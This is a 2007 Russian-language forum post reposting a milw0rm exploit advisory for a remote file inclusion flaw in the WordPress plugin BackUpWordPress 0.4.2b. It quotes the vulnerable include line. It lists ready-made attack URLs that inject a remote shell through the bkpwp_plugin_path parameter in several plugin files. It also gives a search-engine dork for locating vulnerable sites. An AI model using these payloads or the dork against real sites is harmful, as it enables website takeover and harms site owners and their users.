01.11.2007, 19:21
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Код:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
Mirror:
http://www.milw0rm.com/exploits/4593
|
|
|